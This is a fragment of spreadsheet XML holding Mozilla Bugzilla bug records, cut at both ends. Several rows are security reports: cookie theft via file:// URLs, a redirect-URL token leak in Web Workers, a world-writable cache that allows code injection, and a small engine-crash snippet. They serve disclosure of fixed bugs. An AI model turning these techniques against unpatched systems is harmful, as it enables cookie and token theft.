      </c>
      <c r="X2128" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2129">
      <c r="A2129" t="n">
        <v>590619</v>
      </c>
      <c r="B2129" t="inlineStr">
        <is>
          <t>2010-08-25 11:41:30 -0700</t>
        </is>
      </c>
      <c r="C2129" t="inlineStr">
        <is>
          <t>Changes to Fx 4 Beta Features Page for b5</t>
        </is>
      </c>
      <c r="D2129" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E2129" t="n">
        <v>1</v>
      </c>
      <c r="F2129" t="n">
        <v>1</v>
      </c>
      <c r="G2129" t="n">
        <v>5</v>
      </c>
      <c r="H2129" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2129" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2129" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2129" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2129" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2129" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2129" t="inlineStr"/>
      <c r="Q2129" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2129" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2129" t="inlineStr">
        <is>
          <t>4.0</t>
        </is>
      </c>
      <c r="T2129" t="n">
        <v>1</v>
      </c>
      <c r="U2129" t="n">
        <v>0</v>
      </c>
      <c r="V2129" t="n">
        <v>13</v>
      </c>
      <c r="W2129" t="inlineStr">
        <is>
          <t>Copy changes to come shortly.</t>
        </is>
      </c>
      <c r="X2129" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2130">
      <c r="A2130" t="n">
        <v>429969</v>
      </c>
      <c r="B2130" t="inlineStr">
        <is>
          <t>2008-04-20 18:03:28 -0700</t>
        </is>
      </c>
      <c r="C2130" t="inlineStr">
        <is>
          <t>Crash [@ IsPercentageAware] with :first-letter, rtl</t>
        </is>
      </c>
      <c r="D2130" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2130" t="n">
        <v>1</v>
      </c>
      <c r="F2130" t="n">
        <v>1</v>
      </c>
      <c r="G2130" t="n">
        <v>3</v>
      </c>
      <c r="H2130" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2130" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2130" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2130" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2130" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2130" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2130" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2130" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2130" t="inlineStr">
        <is>
          <t>[sg:critical] Fixed by bug 429968, post 1.8-branch</t>
        </is>
      </c>
      <c r="Q2130" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2130" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2130" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2130" t="n">
        <v>1</v>
      </c>
      <c r="U2130" t="n">
        <v>0</v>
      </c>
      <c r="V2130" t="n">
        <v>15</v>
      </c>
      <c r="W2130" t="inlineStr">
        <is>
          <t>Created attachment 316745
testcase (crashes Firefox when loaded)
Loading the testcase triggers:
###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file /Users/jruderman/trunk/mozilla/layout/generic/nsInlineFrame.cpp, line 469
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file /Users/jruderman/trunk/mozilla/layout/generic/nsContainerFrame.cpp, line 1116
Crash [@ IsPercentageAware].
Security-sensitive because the testcase is very similar to the testcase for bug 429968.</t>
        </is>
      </c>
      <c r="X2130" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2131">
      <c r="A2131" t="n">
        <v>920743</v>
      </c>
      <c r="B2131" t="inlineStr">
        <is>
          <t>2013-09-25 13:42:53 -0700</t>
        </is>
      </c>
      <c r="C2131" t="inlineStr">
        <is>
          <t>[commbadge] migrate ActivityLog objects from App History to CommunicationNote objects</t>
        </is>
      </c>
      <c r="D2131" t="inlineStr">
        <is>
          <t>2014-03-18 12:39:00 -0700</t>
        </is>
      </c>
      <c r="E2131" t="n">
        <v>1</v>
      </c>
      <c r="F2131" t="n">
        <v>1</v>
      </c>
      <c r="G2131" t="n">
        <v>6</v>
      </c>
      <c r="H2131" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2131" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2131" t="inlineStr">
        <is>
          <t>Reviewer Tools</t>
        </is>
      </c>
      <c r="K2131" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L2131" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2131" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2131" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2131" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2131" t="inlineStr">
        <is>
          <t>[qa+]</t>
        </is>
      </c>
      <c r="Q2131" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2131" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2131" t="inlineStr">
        <is>
          <t>2014-01-14</t>
        </is>
      </c>
      <c r="T2131" t="n">
        <v>1</v>
      </c>
      <c r="U2131" t="n">
        <v>0</v>
      </c>
      <c r="V2131" t="n">
        <v>7</v>
      </c>
      <c r="W2131" t="inlineStr">
        <is>
          <t>Migrate all the history from http://f.cl.ly/items/0U472b2c1K1r1e1d0k0H/Screen%20Shot%202013-09-25%20at%2010.33.34%20AM.png to be stored as CommunicationNote objects, so they can be viewed from the Communication Dashboard.</t>
        </is>
      </c>
      <c r="X2131" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2132">
      <c r="A2132" t="n">
        <v>422080</v>
      </c>
      <c r="B2132" t="inlineStr">
        <is>
          <t>2008-03-11 05:51:04 -0700</t>
        </is>
      </c>
      <c r="C2132" t="inlineStr">
        <is>
          <t>please push taxonomy_role module to production</t>
        </is>
      </c>
      <c r="D2132" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E2132" t="n">
        <v>1</v>
      </c>
      <c r="F2132" t="n">
        <v>1</v>
      </c>
      <c r="G2132" t="n">
        <v>6</v>
      </c>
      <c r="H2132" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2132" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J2132" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K2132" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2132" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2132" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N2132" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2132" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2132" t="inlineStr"/>
      <c r="Q2132" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2132" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2132" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2132" t="n">
        <v>1</v>
      </c>
      <c r="U2132" t="n">
        <v>0</v>
      </c>
      <c r="V2132" t="n">
        <v>15</v>
      </c>
      <c r="W2132" t="inlineStr">
        <is>
          <t>Hello ,
I would like to push the contributed module taxonomy_role to production which will be a replacement for taxonomy_access module. Can i go ahead and commit this module into subversion .
Regards Paul</t>
        </is>
      </c>
      <c r="X2132" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2133">
      <c r="A2133" t="n">
        <v>250605</v>
      </c>
      <c r="B2133" t="inlineStr">
        <is>
          <t>2004-07-09 09:44:34 -0700</t>
        </is>
      </c>
      <c r="C2133" t="inlineStr">
        <is>
          <t>Metadata changes on private attachments shown in bugmail to people not in the insidergroup</t>
        </is>
      </c>
      <c r="D2133" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:40 -0800</t>
        </is>
      </c>
      <c r="E2133" t="n">
        <v>1</v>
      </c>
      <c r="F2133" t="n">
        <v>1</v>
      </c>
      <c r="G2133" t="n">
        <v>4</v>
      </c>
      <c r="H2133" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2133" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2133" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K2133" t="inlineStr">
        <is>
          <t>2.17.7</t>
        </is>
      </c>
      <c r="L2133" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2133" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2133" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2133" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2133" t="inlineStr">
        <is>
          <t>[does not affect 2.16.x] [fixed in 2.18rc3] [fixed in 2.19.1]</t>
        </is>
      </c>
      <c r="Q2133" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2133" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2133" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2133" t="n">
        <v>1</v>
      </c>
      <c r="U2133" t="n">
        <v>0</v>
      </c>
      <c r="V2133" t="n">
        <v>10</v>
      </c>
      <c r="W2133" t="inlineStr">
        <is>
          <t>If an attachment is private, requests and changes to the description, mime-type,
etc.. should also be private.
Best bet is to LEFT JOIN in the attachments when going through the bug, pull the
private flag, and or that into $anyprivate</t>
        </is>
      </c>
      <c r="X2133" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2134">
      <c r="A2134" t="n">
        <v>1634872</v>
      </c>
      <c r="B2134" t="inlineStr">
        <is>
          <t>2020-05-02 05:26:43 -0700</t>
        </is>
      </c>
      <c r="C2134" t="inlineStr">
        <is>
          <t>Leak of post-redirect url in error stacktrace when script loaded via importScripts in Web Workers</t>
        </is>
      </c>
      <c r="D2134" t="inlineStr">
        <is>
          <t>2024-05-30 10:14:04 -0700</t>
        </is>
      </c>
      <c r="E2134" t="n">
        <v>1</v>
      </c>
      <c r="F2134" t="n">
        <v>1</v>
      </c>
      <c r="G2134" t="n">
        <v>3</v>
      </c>
      <c r="H2134" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2134" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2134" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K2134" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2134" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2134" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2134" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [sec-survey][adv-main79+][adv-ESR78.1+] [adv-esr68.11+]</t>
        </is>
      </c>
      <c r="Q2134" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2134" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2134" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T2134" t="n">
        <v>1</v>
      </c>
      <c r="U2134" t="n">
        <v>0</v>
      </c>
      <c r="V2134" t="n">
        <v>49</v>
      </c>
      <c r="W2134" t="inlineStr">
        <is>
          <t>Created attachment 9145206
screenshot_013.png
Hello. I found the way how to owner of "a" domain can know the post-redirect URL, loaded from "b" domain.
Here is the example: https://obmi.me/pocs/webworkerexample_5b52f35f-807f-4255-8429-f61a588f404c
The scenario:
1. The page in domain 'a.com' has a Web Worker.
2. The worker calls importScripts function with the link to the redirector page in domain 'b.com'
3. The redirector in 'b.com' domain returns a redirect to the valid javascript script with sensitive data in url, like authorization token, csrf token, etc. (It's popular flow in many websites)
4. The worker calls some function from loaded script, which throws an error and catch it via 'try{...}catch(e){}'
AR: The 'e.stack' property contains the full url of the script loaded from 'b.com' and contains the sensitive data.
ER: ??? Maybe 'e.stack' must contain the first url (which was used as argument in importScripts call) or cutted url. 
Reproduced in Firefox 75.0</t>
        </is>
      </c>
      <c r="X2134" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2135">
      <c r="A2135" t="n">
        <v>491801</v>
      </c>
      <c r="B2135" t="inlineStr">
        <is>
          <t>2009-05-06 20:33:08 -0700</t>
        </is>
      </c>
      <c r="C2135" t="inlineStr">
        <is>
          <t>Arbitrary domain cookie access from content loaded via local file (file:/// URL)</t>
        </is>
      </c>
      <c r="D2135" t="inlineStr">
        <is>
          <t>2020-05-04 10:56:59 -0700</t>
        </is>
      </c>
      <c r="E2135" t="n">
        <v>1</v>
      </c>
      <c r="F2135" t="n">
        <v>1</v>
      </c>
      <c r="G2135" t="n">
        <v>3</v>
      </c>
      <c r="H2135" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2135" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2135" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2135" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2135" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M2135" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2135" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2135" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2135" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q2135" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2135" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2135" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2135" t="n">
        <v>1</v>
      </c>
      <c r="U2135" t="n">
        <v>0</v>
      </c>
      <c r="V2135" t="n">
        <v>20</v>
      </c>
      <c r="W2135" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10
Content loaded from a local file (file:/// URL) can read cookies from arbitrary domains.
The domain name is calculated from the host portion of the URL, but the host name is ignored when loading content.
For example, file://example.com/C:/foo.html will load foo.html from the local disk, but the domain will be example.com.
If Firefox is configured as the default browser, remote HTML content served with "Content-Disposition: attachment" will be saved locally before being opened.  When opened, the content can load itself and specify an arbitrary domain for the host name.  Any currently readable cookies for the domain can be retrieved via 'document.cookie'.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2135" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2136">
      <c r="A2136" t="n">
        <v>561539</v>
      </c>
      <c r="B2136" t="inlineStr">
        <is>
          <t>2010-04-24 02:13:19 -0700</t>
        </is>
      </c>
      <c r="C2136" t="inlineStr">
        <is>
          <t>"Assertion failure: isQName(), at ../jsobjinlines.h" or "Assertion failure: obj-&gt;getClass() == &amp;js_NamespaceClass.base || IsQNameClass(obj-&gt;getClass()), at ../jsxml.cpp" with e4x</t>
        </is>
      </c>
      <c r="D2136" t="inlineStr">
        <is>
          <t>2013-03-18 11:17:22 -0700</t>
        </is>
      </c>
      <c r="E2136" t="n">
        <v>1</v>
      </c>
      <c r="F2136" t="n">
        <v>1</v>
      </c>
      <c r="G2136" t="n">
        <v>3</v>
      </c>
      <c r="H2136" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2136" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2136" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2136" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2136" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2136" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2136" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2136" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2136" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey, [sg:critical][critsmash:resolved]</t>
        </is>
      </c>
      <c r="Q2136" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2136" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2136" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2136" t="n">
        <v>1</v>
      </c>
      <c r="U2136" t="n">
        <v>0</v>
      </c>
      <c r="V2136" t="n">
        <v>17</v>
      </c>
      <c r="W2136" t="inlineStr">
        <is>
          <t>gczeal(1)
x = &lt;x&gt;&gt;&lt;/x&gt;
print(x..x)
asserts js debug shell on TM tip without -j at Assertion failure: isQName(), at ../jsobjinlines.h:333
Tested on 64-bit Mac 10.6.3. Setting s-s because this involves gczeal.</t>
        </is>
      </c>
      <c r="X2136" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2137">
      <c r="A2137" t="n">
        <v>1849037</v>
      </c>
      <c r="B2137" t="inlineStr">
        <is>
          <t>2023-08-16 13:34:10 -0700</t>
        </is>
      </c>
      <c r="C2137" t="inlineStr">
        <is>
          <t>Many uses of TypedArray::Create don't handle failures correctly</t>
        </is>
      </c>
      <c r="D2137" t="inlineStr">
        <is>
          <t>2024-06-20 19:34:47 -0700</t>
        </is>
      </c>
      <c r="E2137" t="n">
        <v>1</v>
      </c>
      <c r="F2137" t="n">
        <v>1</v>
      </c>
      <c r="G2137" t="n">
        <v>3</v>
      </c>
      <c r="H2137" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2137" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2137" t="inlineStr">
        <is>
          <t>DOM: Bindings (WebIDL)</t>
        </is>
      </c>
      <c r="K2137" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2137" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2137" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2137" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2137" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2137" t="inlineStr">
        <is>
          <t>[adv-main121+]</t>
        </is>
      </c>
      <c r="Q2137" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2137" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2137" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T2137" t="n">
        <v>1</v>
      </c>
      <c r="U2137" t="n">
        <v>0</v>
      </c>
      <c r="V2137" t="n">
        <v>16</v>
      </c>
      <c r="W2137" t="inlineStr">
        <is>
          <t>Looking at the uses of [TypedArray::Create](https://searchfox.org/mozilla-central/search?q=TypedArray%3A%3ACreate) it seems to me like many either don't really consider this API fallible at all or don't clear the pending exception properly.
Considering how many problematic uses there are, even in some abstractions like [CryptoBuffer::ToArrayBuffer](https://searchfox.org/mozilla-central/search?q=symbol:_ZNK7mozilla3dom12CryptoBuffer13ToArrayBufferEP9JSContext&amp;redirect=false), we should consider changing this API. I imagine we could change it to have an ErrorResult parameter by stealing the exception internally?</t>
        </is>
      </c>
      <c r="X2137" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2138">
      <c r="A2138" t="n">
        <v>1337304</v>
      </c>
      <c r="B2138" t="inlineStr">
        <is>
          <t>2017-02-07 01:24:23 -0800</t>
        </is>
      </c>
      <c r="C2138" t="inlineStr">
        <is>
          <t>Fennec cache directory is world writable</t>
        </is>
      </c>
      <c r="D2138" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E2138" t="n">
        <v>1</v>
      </c>
      <c r="F2138" t="n">
        <v>1</v>
      </c>
      <c r="G2138" t="n">
        <v>6</v>
      </c>
      <c r="H2138" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2138" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2138" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2138" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2138" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2138" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2138" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2138" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2138" t="inlineStr">
        <is>
          <t>[adv-main51.0.3+]</t>
        </is>
      </c>
      <c r="Q2138" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2138" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2138" t="inlineStr">
        <is>
          <t>Firefox 54</t>
        </is>
      </c>
      <c r="T2138" t="n">
        <v>1</v>
      </c>
      <c r="U2138" t="n">
        <v>0</v>
      </c>
      <c r="V2138" t="n">
        <v>15</v>
      </c>
      <c r="W2138" t="inlineStr">
        <is>
          <t>This is bad. We set the Fennec cache directory to be world writable here [1]. Now that we default to extracting libraries to the cache directory, it means any app can change our extracted libraries and inject arbitrary code.
[1] https://dxr.mozilla.org/mozilla-central/rev/af8a2573d0f1e9cc6f2ba0ab67d7a702a197f177/mobile/android/geckoview/src/main/java/org/mozilla/gecko/mozglue/GeckoLoader.java#219</t>
        </is>
      </c>
      <c r="X2138" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2139">
      <c r="A2139" t="n">
        <v>967354</v>
      </c>
      <c r="B2139" t="inlineStr">
        <is>
          <t>2014-02-03 19:35:34 -0800</t>
        </is>
      </c>
      <c r="C2139" t="inlineStr">
        <is>
          <t>WebGL: stack-buffer-underflow [@mozilla::detail::GuardObjectNotificationReceiver::GuardObjectNotificationReceiver]</t>
        </is>
      </c>
      <c r="D2139" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:42 -0700</t>
        </is>
      </c>
      <c r="E2139" t="n">
        <v>1</v>
      </c>
      <c r="F2139" t="n">
        <v>1</v>
      </c>
      <c r="G2139" t="n">
        <v>3</v>
      </c>
      <c r="H2139" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2139" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2139" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2139" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2139" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2139" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2139" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2139" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2139" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q2139" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2139" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2139" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T2139" t="n">
        <v>1</v>
      </c>
      <c r="U2139" t="n">
        <v>0</v>
      </c>
      <c r="V2139" t="n">
        <v>34</v>
      </c>
      <c r="W2139" t="inlineStr">
        <is>
          <t>Created attachment 8369836
testcase
WebGL: copyTexImage2D: the maximum texture size for level 268435456 is 16384
The stack for the stack-buffer-underflow for an optimized build seems mangled.
Tested with http://hg.mozilla.org/integration/mozilla-inbound/rev/53489b3e14f1</t>
        </is>
      </c>
      <c r="X2139" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2140">
      <c r="A2140" t="n">
        <v>411369</v>
      </c>
      <c r="B2140" t="inlineStr">
        <is>
          <t>2008-01-08 15:42:27 -0800</t>
        </is>
      </c>
      <c r="C2140" t="inlineStr">
        <is>
          <t>Crash while trying to print [@ @0x0 @0x1000 _cairo_meta_surface_create] [@ _moz_cairo_surface_finish ]</t>
        </is>
      </c>
      <c r="D2140" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:47 -0700</t>
        </is>
      </c>
      <c r="E2140" t="n">
        <v>1</v>
      </c>
      <c r="F2140" t="n">
        <v>1</v>
      </c>
      <c r="G2140" t="n">
        <v>3</v>
      </c>
      <c r="H2140" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2140" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2140" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K2140" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2140" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2140" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N2140" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2140" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2140" t="inlineStr"/>
      <c r="Q2140" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2140" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2140" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2140" t="n">
        <v>1</v>
      </c>
      <c r="U2140" t="n">
        <v>1</v>
      </c>
      <c r="V2140" t="n">
        <v>66</v>
      </c>
      <c r="W2140" t="inlineStr">
        <is>
          <t>With every page, this crash happens for me here on current trunk build on Vista.
http://crash-stats.mozilla.com/report/index/4a0b1611-be42-11dc-aa45-001a4bd43ef6
On branch I get a "Printing failed when starting the document." error instead, which is at least better than crashing.
I haven't looked at when this regressed.</t>
        </is>
      </c>
      <c r="X2140" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2141">
      <c r="A2141" t="n">
        <v>1064157</v>
      </c>
      <c r="B2141" t="inlineStr">
        <is>
          <t>2014-09-07 23:24:19 -0700</t>
        </is>
      </c>
      <c r="C2141" t="inlineStr">
        <is>
          <t>[v2.0 only] Homescreen is foreground while task manager is displayed</t>
        </is>
      </c>
      <c r="D2141" t="inlineStr">
        <is>
          <t>2014-12-01 22:31:12 -0800</t>
        </is>
      </c>
      <c r="E2141" t="n">
        <v>1</v>
      </c>
      <c r="F2141" t="n">
        <v>1</v>
      </c>
      <c r="G2141" t="n">
        <v>6</v>
      </c>
      <c r="H2141" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2141" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2141" t="inlineStr">
        <is>
          <t>Gaia::System::Window Mgmt</t>
        </is>
      </c>
      <c r="K2141" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2141" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2141" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2141" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2141" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2141" t="inlineStr">
        <is>
          <t>[caf priority: p1][CR 720700]</t>
        </is>
      </c>
      <c r="Q2141" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
